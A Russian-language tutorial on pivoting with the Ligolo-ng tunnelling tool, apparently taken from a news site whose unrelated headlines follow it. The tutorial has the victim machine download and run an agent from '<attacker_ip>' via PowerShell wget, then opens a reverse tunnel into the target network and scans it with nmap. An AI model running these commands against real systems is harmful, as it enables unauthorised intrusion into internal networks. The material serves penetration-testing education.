Pivoting: Ligolo-ng

Pivoting: Ligolo-ng
Актуально

Ligolo-ng — это легкий и эффективный инструмент, разработанный для создания туннелей через обратные TCP/TLS-соединения с помощью tun-интерфейса, без необходимости использования SOCKS. Среди особенностей стоит отметить его GO-код, VPN-подобное поведение, настраиваемый прокси, скорость соединения до 100 Мбит/с.

Ligolo против Chisel

  • Ligolo-ng превосходит Chisel по скорости и возможностям настройки.
  • В Chisel используется модель «сервер-клиент», в то время как Ligolo-ng устанавливает индивидуальные соединения с каждой целью.
  • Ligolo-ng сокращает время обслуживания за счет отсутствия остатков инструментов на диске или в памяти.
  • Ligolo-ng поддерживает различные протоколы, включая ICMP, UDP, SYN, в отличие от Chisel, который работает в основном по HTTP с использованием websocket.

Скачасть инструмент можно по ссылке: https://github.com/nicocha30/ligolo-ng

Чтобы инициировать включение, выполните следующую последовательность команд:

ip tuntap add user root mode tun ligoloip link set ligolo up

Распакуйте файл прокси-сервера Ligolo:

tar -xvzf ligolo-ng_proxy_0.5.1_linux_amd64.tar.gz

Чтобы изучить весь спектр параметров, воспользуйтесь командой:

./proxy -h

Опции, показанные на предыдущем изображении, предназначены для включения различных типов сертификатов в прокси.

./proxy -selfcert

После выполнения команды инструмент начинает работать на атакующей машине. Теперь установим агент Ligolo на целевую машину, распакуем файл агента ligolo с помощью команды:

unzip ligolo-ng_agent_0.5.1_windows_amd64.zip

Теперь необходимо передать распакованный агент на машину жертвы. На целевом ПК выполним команду:

powershell wget http://<attacker_ip>/agent.exe -o agent.exe

Запустим агента:

./agent.exe -connect <attacker_ip>:11601 -ignore-cert

После выполнения команды будет инициирована новая сессия Ligolo. Затем выполните команду session, выбрав значение 1 для доступа к активной сессии. После установления сессии выполните команду ifconfig, как показано на изображении ниже.

Добавим маршрут до целевой сети в конфигурацию:

ip route add 192.168.148.0/24 dev ligolo

Вернитесь в окно прокси-сессии Ligolo и запустите процесс туннелирования, выполнив команду start.

Теперь при попытке пингануть IP в целевой сети, будут наблюдаться успешные ответы. Кроме того, можно провести комплексное сканирование с помощью nmap.


Дрозденко озвучил причину хлопков в Ленинградской области
Чеченский омбудсмен обвинил правозащитников, помогавших Лие Заурбековой выехать из России, в мошенничестве и похищении
Конечно, вот возможный вариант заголовка:nn"ФРАНШИЗА КОФЕЛАР: Мошенничество, Обман и Неисполнение Обязательств"
"КВИЗ, ПЛИЗ!": Иллюзия успеха или ловушка обмана? Расследование недостатков и разочарований франшизы
ФРАНШИЗА АКАДЕМИЯ ХОРЕОГРАФИИ СИНЕРГИЯ: Обещания, Реальность и Разочарование
Катастрофа под маской: Разоблачение франшизы SVALKA.ME как источника мошенничества и экологического беспредела
Сноха нового министра обороны удалила свой Instagram сразу после его назначения
Во Вроцлаве пьяный водитель пытался дать полицейским взятку — теперь ему грозит до 8 лет тюрьмы
Пекарни Крошкина: Запутанный Клубок Обмана и Некомпетентности
Новости
Дрозденко озвучил причину хлопков в Ленинградской области
19.05.2024
Армия Израиля снова ведет бои в секторе Газа
19.05.2024
Чеченский омбудсмен обвинил правозащитников, помогавших Лие Заурбековой выехать из России, в мошенничестве и похищении
19.05.2024
Конечно, вот возможный вариант заголовка:nn"ФРАНШИЗА КОФЕЛАР: Мошенничество, Обман и Неисполнение Обязательств"
18.05.2024
"КВИЗ, ПЛИЗ!": Иллюзия успеха или ловушка обмана? Расследование недостатков и разочарований франшизы
18.05.2024
ФРАНШИЗА АКАДЕМИЯ ХОРЕОГРАФИИ СИНЕРГИЯ: Обещания, Реальность и Разочарование
18.05.2024
Катастрофа под маской: Разоблачение франшизы SVALKA.ME как источника мошенничества и экологического беспредела
18.05.2024
Сноха нового министра обороны удалила свой Instagram сразу после его назначения
18.05.2024
Во Вроцлаве пьяный водитель пытался дать полицейским взятку — теперь ему грозит до 8 лет тюрьмы
18.05.2024
Пекарни Крошкина: Запутанный Клубок Обмана и Некомпетентности
18.05.2024
Резонанс
Армия Израиля снова ведет бои в секторе Газа
Армия Израиля снова ведет бои в секторе Газа
19.05.2024
Кремль «под газом»
Кремль «под газом»
18.05.2024
Что нужно съесть, чтобы поумнеть? Топ продуктов, стимулирующих работу мозга
Что нужно съесть, чтобы поумнеть? Топ продуктов, стимулирующих работу мозга
17.05.2024
Григорий Антипенко: куда пропал актер, почему отказывается сниматься и чем занят теперь
Григорий Антипенко: куда пропал актер, почему отказывается сниматься и чем занят теперь
16.05.2024
О бездарностях, раскрученных за деньги и как с этим бороться
О бездарностях, раскрученных за деньги и как с этим бороться
16.05.2024
ФТС рулят питерские
ФТС рулят питерские
16.05.2024
Влюбился в жену знаменитого отца, умер в 26 лет при невыясненых обстоятельствах. Печальная судьба единственного сына Георгия Данелия
Влюбился в жену знаменитого отца, умер в 26 лет при невыясненых обстоятельствах. Печальная судьба единственного сына Георгия Данелия
16.05.2024
В Сан-Франциско недавно прошла презентация последней версии GPT
В Сан-Франциско недавно прошла презентация последней версии GPT
15.05.2024
Вспоминаем 7 лучших фильмов с Евой Грин
Вспоминаем 7 лучших фильмов с Евой Грин
15.05.2024
Российские кинотеатры возобновили пиратские показы фильмов
Российские кинотеатры возобновили пиратские показы фильмов
15.05.2024
Теги
Солтаев Мансур Заурбекова Лия ФРАНШИЗА КОФЕЛАР ПЛИЗ! КВИЗ ФРАНШИЗА АКАДЕМИЯ ХОРЕОГРАФИИ СИНЕРГИЯ SVALKA.ME Белоусова Евгения ПЕКАРНИ КРОШКИНА РУССКИЕ БЛИНЫ HILOFT GOOD FOOD КЛАУСТРОФОБИЯ Матвиенк Кудешкина Ольга Заостровцев Евгений Голландцев Андрей Саенко Андрей Щекочихин Юрий INSTATIME GORJOB.RU HANDSON ПРЯДКИ В ПОРЯДКЕ TANDOOR SUBWAY СOPPABAR Л’ЭТУАЛЬ Российский рубль Республика Саха (Якутия) Таттинский улус